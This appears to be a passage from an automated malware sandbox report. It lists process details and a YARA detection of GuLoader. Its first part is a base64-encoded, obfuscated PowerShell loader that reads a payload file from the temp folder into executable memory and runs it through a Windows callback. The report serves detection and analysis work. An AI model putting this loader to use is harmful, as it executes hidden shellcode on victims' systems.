dABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbgBkAGUAcgBmAGkAYQB1ACAAVABhAGwAbAB3AG8AbwA1ACAAdgBpAG4AbwBsAG8AZwBpAHMAdAAgAEwATwBZAEEATABFACAAVgBhAGwAZQByAGkANAAgAGwAYQB2AGkAbgAgAEIAYQBhAHIAOQAgAGYAbwByAHYAZQBuAHQAZQBsACAATgBvAG4AYwBvAG4AdgAgAA0ACgAjAFAARQBSAFMATwBOAE4AQQBWACAAaQBkAGUAbQBwACAAcwB0AGEAcgB0ACAAYwBoAG8AeQBhAGkAbgB0AGkAIABsAG8AeABpAGMAdAAgAEgAZQBzAHQAZQBiAHIAZQAxACAARgBvAGUAbABlAGIAYQBsACAATQBvAGkAcwAgAEwAYQBsAGwAZQB0ACAATwBiAGUAbABpAHMAawAzACAAZAByAGkAawBrACAATABhAG4AYQBzAHIAIAANAAoAIwBiAGUAcwB0AHIAYQBhAGwAaQBuACAAUwBUAFIATQBQAEUASAAgAFYARQBEAEwAIABNAHkAZQBsAG8AIABEAGkAcwBoACAAQQBjAGMAZQBwAHQAMQAgAFUAbgBwAGwAMwAgAEEAUgBCAEUASgBEAFMATABTAEgAIABBAG4AbQBlAGwAZABlAGwAcwBlACAAUwBLAE8AVgBIAFkAVABUAEUAIABwAHIAcwB0AGUAcwBrAGEAYgAgAFAAdQBiAGwAaQBjAGkAcwA4ACAAVQBtAGkAbgBkAGUAbAA0ACAADQAKACMAcwBwAG8AcgB0AHMAbQBhACAARABrAG4AaQBuAGcAcwBzADQAIABEAGUAcABvAHMAaQAxACAAcgBlAGcAbgBpAG4AZwBzAGYAdQAgAHMAdQBzAHAAZQAgAEQAZQBiAGEAIAByAGUAcQB1AGkAcgAgAFMAYQBsAHQAcwB0AGUAbgBtADEAIABSAEQARQBQAEEATgBHAEkAIAANAAoAIwBTAGUAbAB2AG0AbwBkAHMAaQBnACAAUwBVAEIARAAgAGsAdgBrAHMAZgBpAG4AZwBlACAAQQBuAG8AbQAgAHQAaABhAGkAbABuAGQAZQAgAE8AbgBkAHUAIABuAG8AbgBwACAAVwBJAE4ARABCACAAYQB0AG8AbQB2AGEAYQBiAG4AZQAgAEMAaABpAGUAIABzAHUAYgBjAGgAbwByAG8AaQAgAFMAVABVAFAASABFAEYATwBLACAASQBtAGIAcgB1AGUAbQAgAEUAcgBuAHIAaQBuAGcAcwBmAHkAIABEAHIAbwBvAHAAcwBiADEAIABwAHIAYQBpAHMAZQBmAHUAbABuACAASQBOAEcARQBOACAATwB2AGUAcgAgAEgAbwBkAHMAIABPAHYAZQByAGgAYQB1AGwAZQA4ACAAdwBvAG8AZABzACAAdQByAGUAdABoAHIAbwAgAEwAbwBrAGEAbABrACAADQAKACMAUgBVAE4ARwBMAEUAUwBTAEsAIABWAGUAcgBkACAAYwB5AGMAbABvAGQAIABhAGYAZABrAG4AaQBuAGcAIABiAHUAcwBsACAAQQB0AHQAdQBuAGkAbgBnACAAUwBhAG4AaQB0AGkAcwBpACAAUABoAG8AdABvAHMAIABCAG8AcgBlAHAAbABhAHQAZgAgAE0AYQBqAG8AcgAgAEoAVQBNAEIATABFACAAVwBIAEUARQBMAEkATgAgAEwAZQBlAHAAaQB0AGQAcgA2ACAAVQBOAFUAUwBFAEQAIABNAEEARwBOACAAQQBnAHIAYQBmADEAIABBAG0AYgBlAHIAbgA0ACAAQQBuAGQAZQBuAGsAbABhADgAIABKAGEAZwBnAGUAZABuACAAcwBvAGwAaQBkAGEAdABpAG4AZwAgAEEAbgBnAGkAdgBlACAAQgBSAEUAVgBWACAATQBJAFMAVABBAE4ASwBFAFIAIAANAAoAIwBQAGEAbABlAGkAYwBoAHQAaAB5ADYAIABDAGwAbwB3AG4AZQByAGkAIAB0AHIAaQB2AHMAZQBsAHMAcAAgAFAAYQBtAGUANgAgAFQAaQBnAGgAdAB3AGkAIABVAG4AdwBpAGwAOAAgAFAAZQByAGkANAAgAFAAcgBvAGQAdQBrACAARABhAGcAYwBlAG4AdAByACAARwBSAEEATgBVAEwAQQAgAFMAagB1AHMAcwBlAG4AcwByAG8ANQAgAEkAUwBDAEgASQBBAEMAQgBFACAATABlAGUAZgA3ACAADQAKACMAVAByAGUAbQBvAHUAcgBpAG4AdAA1ACAAUwBKAFUAUwBLAEUATQBBAEwAIABEAGoAZQBsAGwAIABNAGkAbABpAHQAcgBsADkAIABHAGwAbwBzAHMAYQBuACAAUgBFAFYASQBFAFcAUwBEACAAUgBFAEUATABQAEUARABBAE4AVAAgAEgAdQBzAGgAbwBsAGQAZQAgAEEATABJAEUATgBBACAARABvAGIAYgBlAGwAdABmAHUAbgAgAFQAZQBhAHQAIABIAGkAbgBkAGUAcgBlACAAUwBrAHkAZAA3ACAAbQB5AGcAZwBlAHMAIABMAHkAbgBsAGEAYQBzAGgAIABQAGEAYQB0AHIAIABGAGEAYgByAGkAawBzADkAIAANAAoAIwBQAEEAQQBUAEUARwBOAEUAUgAgAEQAZQB0AGEAbABqAGUAcgBlAHIAIAB0AGkAZwBnAGUAcgBzAGsAZQAgAEYAaQBsAGUAcwAgAHIAZQB0AHMAbwBwAGcAcgAgAFAATABVAFIAIABKAHUAZwBlAG4AZABtAG4AcwB0ACAAVQBkAGIAdQA1ACAASABlAGEAdgB5AGgAIABtAGkAbABpACAAbQBlAGwAbwBkACAAYQBmAGwAYQBkAG4AaQBuACAADQAKACMAYQBmAHQAdgAgAGEAYQBuAGQAZQB2AGUAIABiAHIAbwBkAHkAYQBnAGEAcwAgAHQAZQBsAGUAbwBjAGUAcgBhAHMAIABPAEMAVABBAFYATwBLACAAWgBhAHIAegB1ADMAIABJAE4ARABTACAAVABXAEkAUwBDACAAUwBLAE8AVgBTAEwATwAgAFQAbwB3AG4AbABhAG4AZABsAHkAIAANAAoAIwBQAFIASQBTACAARwByAHUAcwB2AGUAagBlADkAIABVAG4AbQBhAHIAYgBsAGUAaQB6ACAAQQBMAEsATwBIAE8ATAAgAEQARQBWAEkAQQBUAEkATwBOACAASABvAG0AYQB0AG8AIABDAHIAZQBhAHQAaQAgAFMAdABvAGIAcwBiADcAIABhAG4AZgBsAGoAZQBuACAARgBvAHIAZQB0AGEAZwBlAG4AIABQAHIAbwB0ACAAVQBQAEwARQBBAFAARQBEACAAZABpAG0AcABsAGUAbQBlACAAZwBlAHIAdABoAGEAcwBoAGEAIABTAFQATwBSAEsARQBOAEIAQgAgAA0ACgAjAEEAcwBzAHUAcgBhAGIAbAAgAE0AZQB0AGEAZgBvAHIAZQByAG4AIABJAEgAVQBLAE8ATQBQACAAWAB5AGwAbwBjADgAIABTAHQAYQBuAGQAYQByACAASABhAG4AZABsAGkAbgBnAHMAbAAgAFAAZQB3AGYAdQBsAGIAbABvADIAIABNAGkAcwB0AG4AMwAgAE8AWQBTAFQARQBSACAARABlAHQAYQBpAGwAcAByACAAcgBlAGYAbwByACAAUgBJAEcAUwBSAEUAVgBJACAAYwBsAG8AZgBpAGIAIABLAE4ASQBDACAAQgByAG4AZQBsAG8AawBrACAARABlAG0AbwBuAHQAZQByADgAIAB0AGEAcgB2ACAAcwBsAGcAZQByAHMAdAAgAFUATgBEAEUAUgAgAA0ACgAjAFMAYQBuAHMAZQB2AGUAOQAgAEkAcgByAGUAcwBwACAAQgBJAFIAQwBIAEUAIABNAGUAZwBhACAARABhAGcAbABuAHMAcwBhADIAIABLAFkAUwBUACAAUwB0AG8AbQBhAHQAbwBsAG8AIABBAHQAdAB5ACAAcgB1AHQAaQBuAGUAcwBzACAAcABpAGMAYQBtAGEAcgAgAGwAYQBjAGMAaQBjAGgAZQAgAEIAWQBHAEcARQBNAFkATgAgAGcAcgBpAG0AYQBzACAAaQBuAHQAcgB1ACAAbQBhAHIAcQAgAGoAYQByAGQAbwBuAG4AIABjAGgAbwBsAG8AcwAgAE0ATwBSAEIASQAgAFMAQQBWAEEARwBFAFMAUwAgAFIASQBEAEUASABFAFMAVABFAFMAIABTAHQAZQBtAG0AZQByAGUAdABzADUAIAByAGUAdgBpACAAQgBhAHMAdABpAGwAbAA4ACAAQgBlAGQAYQAgAFMAQwBVAFIAUgBJAEUAIABVAE0ARQBEAEcAUgAgAEsAeQBsAGkAbgAgAHUAbgBmAGkAIABzAGwAaQBwACAAUABSAEUASABFAE4AUwAgAA0ACgAjAEEAbgBkAGUAbgBrAGwAYQBzAHMAIABkAGUAbQBhACAAUwBDAEkATABMAEEARQBSACAAYgBsAHIAZQBoAGEAIABSAG8AbgBpAG4AZwA4ACAAQwBVAEUATQBBAE4AUwBIAEkAIABLAGEAcwBlAHIAbgAgAFIAdQBmAGcAYQByAGQAaQBuACAAcAByAGEAbgBnAGUAbgAgAFUAUwBQAEUAQwBJAEYASQAgAFMAdQBiAGwAaQBtACAASwBFAFIATgBFAE8AUAAgAEEAcgBpAGQAIABiAHIAbgBlAGYAZAAgAA0ACgAjAEsAYQBmAGYAZQBnACAAQgBvAG8AbgBkAG8AZwBnAGwAZQAgAE4AbwBzAHQAIABSAGkAZgBsAGUAdAB0AG8AcgA3ACAAUwBVAFIARwBFAEwARQBTAFMAIABJAGQAcgB0AHMAaABqAHMAawAyACAAcgBlAHMAZQByAHYAYQB0AGkAbwAgAGsAaQBzAHMAZQAgAGcAYQB5AGwAdQBzAHMAaQB0ACAAYQB0AG8AbQBhAGYAZgBhAGwAZAAgAFIAQQBHAEUATwBVAFMAIABCAHUAdABpAGsAcwBkAHIAaQAgAG8AcABkAGEAdABlACAASABvAHIAbgBiAHIAaQA0ACAAQwBvAG4AcwBhAG4ANwAgAE0ATABLAEUASwAgAEkAbwBkAGkAZABwAGgAaQBsADYAIABJAGQAZQBhAGwAaQBzAG0AZQA0ACAARgBsAGEAZwBlACAASQBuAHYAbwBsAHYAZQByAHMANAAgAHUAbABuAGEAYQBuAGkAIABSAGsAZQBuAHUAbgAgAGwAaQBtAGUAbABpACAAYQBhAHIAcgBpACAAbQBhAGQAZABvAHgAdQBkAHYAIABIAGUAbABoAGUAcwB0AGUAbgBhACAAUABvAHMAdAB1AGwAZQByADEAIABCAGUAegBlAGwAcwBjACAAQgBsAGkAbgAgAA0ACgAjAEMAYQBzAHQAZQByADYAIAB2AGEAbgBkACAAYwBoAGEAZQBuAG8AIABTAHEAdQBhAHQAdAA1ACAASABJAEcASABMACAAQwBvAG4AYwBoAGEAZQAgAFAAYQByAHQAIABEAEUASwBMACAAcwB1AGIAcwBpAGQAZQAgAHUAbgBkAGUAIABmAGEAdQBuAGUAcgBhACAAcwBwAHIAZQBhACAAUABBAEMASQBGAEkAQwBBACAARgBKAEUATgBEAFQATABJACAAYwBlAHAAaABhAGwAbwB0AGgAbwAgAFMARQBSAFIAQQBUAEkATwAgAFMAZQByAGIAaQBzAGsAZQBsADgAIAANAAoAIwBGAEwATABFAFMAQQBOACAAQQByAGEAZwBvAHIAbgB1AG4AYQAgAGUAbgBzAHIAZQB0AHQAZQBkAGUAIABNAHkAZQBsACAAcwB1AHAAZQByAHMAZQB4AGUAIABBAGcAZwByAGEAdgBlAHIAZQAgAHQAaQBtAGUAbABvAGYAIABzAGkAbQBlAG8AbgBiAGUAdgBpACAAUABSAEUATwBQAEUATgBJAE4AIABzAG0AZQBsAHQAZQAgAGoAZQBsAGwAeQBmAGkAcwBoAGEAIABHAGUAcgByAGEAIABQAG8AaQB0AHIAYQBpAGwAbwAgAA0ACgAjAFgAZQBuAG8AZwBsAG8AcwAgAE8AdQB0AG4AIAByAGUAdgBpAHMAbwByAGYAIABWAEEAQQBCAEUATgBGAEEAIABSAHUAbQBzAGsAaQBiAGUAcgAxACAAQQB0AHQAZQBzAHQAZQA5ACAASABhAGEAbgBkAGgAdgBlAGwAcwA4ACAARABJAFAATABPAE0AIABTAEkATABFAE4AQQBMACAATwBhAGsAeQBzAGwAagBkADQAIABMAGEAdABlAG4AcwAgAG0AZgBnAGcAcgB1AG4AIABrAGEAcgB0AG8AdABlAGsAcwBvACAADQAKACMAZQBzAHQAbwAgAFQAYQBsAG0AIABUAHUAYQByAGUAZwAyACAAQgBsAG8AawBmAHUAbgBrAHQAaQAxACAARgBvAHIAbABhACAAVAByAGEAbgAxACAAQQByAGIAZQBqAGQAIABOAG8AbgBjAG8AIABzAGkAZwB0AGUAbQBlAGwAcwBvACAARwBhAGwAdgBhAG4AaQAgAEYAbwBkAGUAcgBmAGEAIABSAGUAcwBlAGMAdAA1ACAADQAKACMARQB0AGEAcABlAGwAYgBlAHQAIABCAGEAYwBrAGYAaQBzAGMAOAAgAE0AWQBMAEQAUgBFACAATQBhAGwAYwA4ACAAZwBhAG0AbQBpAGMAawB1ACAARQBnAG0AdQBuAHQAdgBhACAASABLAEEAUwAgAFUAbgBpAHIAbwBuAGkAYwA1ACAAVABpAGwAYgBhAGcAZQBzAGsAIABGAEkAUgBFAE8ARwBUAFkAVgAgAFMAdABlAGEAZABpAGUAcwB0ACAAUgBnAHQAZQBuAGQAZQBzADQAIABTAGsAdgBhAGQAcgBvAG4AZQAgAEIAcgBlAGkAcwBsAGEAawBpACAADQAKACMAVgBJAFIASwBTAE8ATQBIACAARwB1AGUAcgA4ACAATQBBAE4AQwBIAEUAIABBAGMAYwBvAG0AbQBvAGQAYQB0ACAAUwBlAG0AaQB2AGUAcgB0AGkANwAgAE4AQQBJAFYAIABMAG8AZwBvAGcAIABTAFAASQBEAFMARwAgAGcAawBhAG4AdABsACAAdAB1AGcAcgBpAGsAcwBwAHIAIABjAGgAYQBtACAAUwB5AHMAdABlAG0AYgBlADUAIABCAFIATwBOAFoARQBGACAADQAKACMAUgB1AG0AcABsAGUAbABhAHMAIABEAEEATgBTAEUATQBVAFMARQAgAE0ARQBTAE8AUgBSAEgAIABVAE4ARABJAFMAQwBPAFYARQAgAFQAaQBkAHQAYQBnAGUAcgBlAHIAIABUAHkAcABvAHMAcwB0AG8ANwAgAEIAUgBPAEsAQQBEAEUAUgBTAFIAIABNAHkAbwBzAG8AdAAgAHIAaQBkAGkAYwB1AGwAbwB1ACAAQgB1AGcAdAAgAHMAbABhAG4AdABlACAAagBvAGwAbABpAGUAZABhAG4AdAAgAE8ATQBEAEkAUgBJAEcARQBSACAARABlAHQAcgBvAG4AaQBzACAARgBhAGQAZAAzACAARAByAGkAawBrACAASwBSAEEARwBFAEYAVQBHACAAUABTAEUAVQBEAE8AQQBNAEEAIABTAFkARABEACAAVQBOAEQARQBUAFIASQBNAEUAIAB0AGEAbQBsAHUAbgBnAHMAdQAgAGwAZQBvAG4AYQByAGQAbwB1ACAATwBwAGwAcgAgAGcAZQBtAGkAbgBhAHQAIABGAHIAdQBnAHQAaAA1ACAATQBFAFQAQQAgAFYAQQBOAEQATABCACAAVQBOAFQASABPACAAbQBpAHMAcgBlAGYAZQByAHIAZQAgAEsAaABhAGwANgAgAFMAdQBrAHIAaQBuAGcAZQAgAHYAZwB0AGkAZwAgAA0ACgANAAoADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAYwBoAG8AbgBkAHIAbwBnAGEAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAZwBkAGkAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBGAG8AbgB0AHMAQQAoAHMAdAByAGkAbgBnACAAUgB1AGMAdABpAG8AdQAsAHUAaQBuAHQAIABNAHUAcwBrAGkAbAB5ADcALABpAG4AdAAgAEQAZQBiAGkANwAsAGkAbgB0ACAAYwBoAG8AbgBkAHIAbwBnAGEAMAAsAGkAbgB0ACAARgBhAHIAbQBhAGsALABpAG4AdAAgAFEAdQBpAG4AcQB1AGUAdgBlACwAaQBuAHQAIABTAEwARwBUACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAPQAiAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQBhAGMAKABbAE0AYQByAHMAaABhAGwAQQBzACgAVQBuAG0AYQBuAGEAZwBlAGQAVAB5AHAAZQAuAEwAUABTAHQAcgApAF0AcwB0AHIAaQBuAGcAIABSAHUAYwB0AGkAbwB1ACwAdQBpAG4AdAAgAE0AdQBzAGsAaQBsAHkANwAsAGkAbgB0ACAARABlAGIAaQA3ACwAaQBuAHQAIABjAGgAbwBuAGQAcgBvAGcAYQAwACwAaQBuAHQAIABGAGEAcgBtAGEAawAsAGkAbgB0ACAAUQB1AGkAbgBxAHUAZQB2AGUALABpAG4AdAAgAFMATABHAFQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGMAaABvAG4AZAByAG8AZwBhADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEMAbABhAHQAaAByAGEANAAsAGkAbgB0ACAAVgBhAHIAZQBkAGUAawBsAGEALAByAGUAZgAgAEkAbgB0ADMAMgAgAGMAaABvAG4AZAByAG8AZwBhACwAaQBuAHQAIABPAHUAdABoAG8AdwBsAGkAbgBnADUALABpAG4AdAAgAGMAaABvAG4AZAByAG8AZwBhADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBLAEUAUgBOAEUATAAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAUgBlAGEAZABGAGkAbABlACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAQwBEAEEAQwAoAGkAbgB0ACAAVgBhAHIAZQBkAGUAawBsAGEAMAAsAHUAaQBuAHQAIABWAGEAcgBlAGQAZQBrAGwAYQAxACwASQBuAHQAUAB0AHIAIABWAGEAcgBlAGQAZQBrAGwAYQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABWAGEAcgBlAGQAZQBrAGwAYQAzACwAaQBuAHQAIABWAGEAcgBlAGQAZQBrAGwAYQA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAVQBTAEUAUgAzADIAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKABJAG4AdABQAHQAcgAgAFYAYQByAGUAZABlAGsAbABhADUALABpAG4AdAAgAFYAYQByAGUAZABlAGsAbABhADYAKQA7AA0ACgANAAoAfQANAAoAIgBAAA0ACgAjAFIAZQBtAG8AcAA4ACAARABSAFQAUgBJAE4ARQBUAEkATgAgAFIAZQB0AHIAZQA0ACAAVABqAGUAcgByAGkAbAAgAFUAcgBzAGsAbwB2AHMAbQByACAARQB4AGkAbABpAGMAbQB5AHMAdAA2ACAASQBsAGQAcwBwAHkAZQBuAGQAZQAgAEIAYQBrAHQAIABNAEUATABJAE8AUgBBACAAcwByAHYAZQByAGkAIABBAHUAZwB1AHIAZQByACAADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwASABlAHQAZQByAG8AMwAuAGQAYQB0ACIADQAKACMAcABvAHMAdABwACAATQBvAG4AbwB0AG8AbgBlAHIAZQAgAFMASQBHAE4ASQBGACAAVABpAGQAcwBrAHIAYQAgAEwARQBGAFQASQAgAFIARQBGAE8AUgBNAFAATABBAE4AIABLAGwAYQBnADUAIABSAG8AdABhAG0AYQBuACAASQBuAGQAaQB2ACAAUgBvAHQAdABlAGYAbgBnAGUAIABUAGUAcgByAGkAdABvAHIAaQAyACAAWABZAEwATwBDAE8AUABBAFAAIABnAG8AZwB5AGQAZQAgAE0AaQBjAHIAbwBiAGUAcAAgAA0ACgAkAGMAaABvAG4AZAByAG8AZwBhADMAPQAwADsADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEAOQA9ADEAMAA0ADgANQA3ADYAOwANAAoAJABjAGgAbwBuAGQAcgBvAGcAYQA4AD0AWwBjAGgAbwBuAGQAcgBvAGcAYQAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAGMAaABvAG4AZAByAG8AZwBhADMALAAwACwAWwByAGUAZgBdACQAYwBoAG8AbgBkAHIAbwBnAGEAOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAjAEsAQQBSAFQATwAgAEMAaABpAGwAIABlAHMAcAByAGkAdABpAG4AcwB0ACAAUwBIAFIASQBMAEwASQBOACAAQgBPAFAATABTACAAQwByAHkAcAB0AG8AIABVAGsAcgBsAGkAZwBzAHQAZQAxACAATQBlAGwAbwB0AHIAYQAgAFMAVQBQAFAAUgBFAFMASQBWAEUAIABDAGgAZQBmACAAUgBvAHMAZQB2AGkAbgBlADUAIABCAGkAbABiAHIAbwBlAG4AcwBwACAAQQByAGIAZQBqADIAIABJAG4AdABlAHIAYwBhAG0AcAAgAEcARQBWAEEATABUAEkAIABSAFUAQwBIAEUAUgBTAFQARQBOACAARABJAFMAUABSACAADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEANAA9AFsAYwBoAG8AbgBkAHIAbwBnAGEAMQBdADoAOgBWAGkAYQBjACgAJABjAGgAbwBuAGQAcgBvAGcAYQAyACwAMgAxADQANwA0ADgAMwA2ADQAOAAsADEALAAwACwAMwAsADEAMgA4ACwAMAApAA0ACgAjAGQAaQBmAGYAZQByAGUAbgAgAGgAYQB2AGUAIABNAG8AYgBpAGwAZQB0AHMAZwByADMAIABhAHIAawBmAGQAZQByACAAaQBuAGQAawAgAEsATABPAEQAUgBJAEEATgBFAFIAIABUAEEAUwBLAEUASwBSAEEAQgBCACAAUwBKAFUAUwBTACAAdwBoAGUAYQB0ACAASAB5AHAAbwBwAGgAeQBzACAAQQBmAGgAbwBsAGQAcwBoAG8AdAAzACAAVABoAHkAcgBvAGMAbwBsACAAVQBEAFYAVQAgAGIAdQBmAGYAIABwAG8AbAB5AGUAdABoACAAYgByAGkAcwBrAGUAdAB1AG4AdAAgAFQAWQBFAFQAQwBPAFEAIABDAG8AbQBwAGEAIABBAGYAdABhAGwAZQBwADYAIABzAHQAaQBuAGsAaQAgAEcARQBOAE4ARQBNAEIATwBSACAAYQBmAHQAZQByAHAAIABBAGwAaQBxAHUAYQBuADEAIABhAG4AdABpAG0AbwBuAHkAZwAgAEYAcgBhAG4AdABzACAAWgBJAFQASQAgAE4AQQBHAEwARQBUAEcAIABCAEwATwBUACAAQgBlAHMAbgBhAGsAawBlADcAIABVAE4ARABUAEEAIABCAHIAYQBzAGgAbAB5AGkAZwAgAA0ACgAkAGMAaABvAG4AZAByAG8AZwBhADUAPQAwADsADQAKACMAQgBvAGwAaQBkAGUAcwBzAGwAYQA1ACAATABBAE4ARABTAFIAIABQAHIAbwBzACAAVABsAGwAZQBzADgAIABPAG0AawBsAGEAcwBzAGkAZgBpADcAIABQAGUAbgB0AGEAYwByAG8AbgBrADQAIABIAEUAUABUAEEAVAAgAFcAYQBrAGUAcgAgAHIAZQBnAGkAbwAgAFUAZwBlAHMAawByAGkANwAgAFMAbABhAHIANAAgAEYATwBSAEUATAAgAA0ACgBbAGMAaABvAG4AZAByAG8AZwBhADEAXQA6ADoAQwBEAEEAQwAoACQAYwBoAG8AbgBkAHIAbwBnAGEANAAsACQAYwBoAG8AbgBkAHIAbwBnAGEAMwAsADUAOAA3ADYANwAsAFsAcgBlAGYAXQAkAGMAaABvAG4AZAByAG8AZwBhADUALAAwACkADQAKACMAQgBFAFMASwAgAFMAdAByAGUAZQB0AHcAYQByAGQANwAgAEwAZQBqAHIAdQBkAHMAdAB5AHIANgAgAFUAbgBsAGEAbgBnAHUAIAB1AG4AawBpAG4AZAAgAEgAQQBLAE0AIAB3AHIAaQBnAGgAdAByAHkAIABCAGEAZwBnAGEAYQByAGQAZQBuADIAIABTAHUAYgBjAG8AbgB0AHIAYQA4ACAAZgBsAGEAdgAgAEcAcgBhAHYAcwB0AGUAZAA3ACAASABpAGcAaABoAGEAdABiAGEAIABTAGgAYQBoACAADQAKAFsAYwBoAG8AbgBkAHIAbwBnAGEAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAGMAaABvAG4AZAByAG8AZwBhADMALAAgADAAKQANAAoADQAKAA==
      Imagebase:0x1170000
      File size:430592 bytes
      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000016.00000002.523684015.00000000096D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
      Reputation:high

      Target ID:23
      Start time:14:03:02
      Start date:10/05/2022
      Path:C:\Windows\System32\conhost.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Imagebase:0x7ff7c9170000
      File size:625664 bytes
      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:32
      Start time:14:03:31
      Start date:10/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.cmdline
      Imagebase:0x1190000
      File size:2170976 bytes
      MD5 hash:350C52F71BDED7B99668585C15D70EEA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:.Net C# or VB.NET
      Reputation:moderate

      Target ID:33
      Start time:14:03:33
      Start date:10/05/2022
      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES571F.tmp" "c:\Users\user\AppData\Local\Temp\xd0x2kfy\CSC444B4F613D554F189420B3812D9BACB.TMP"
      Imagebase:0xe40000
      File size:43176 bytes
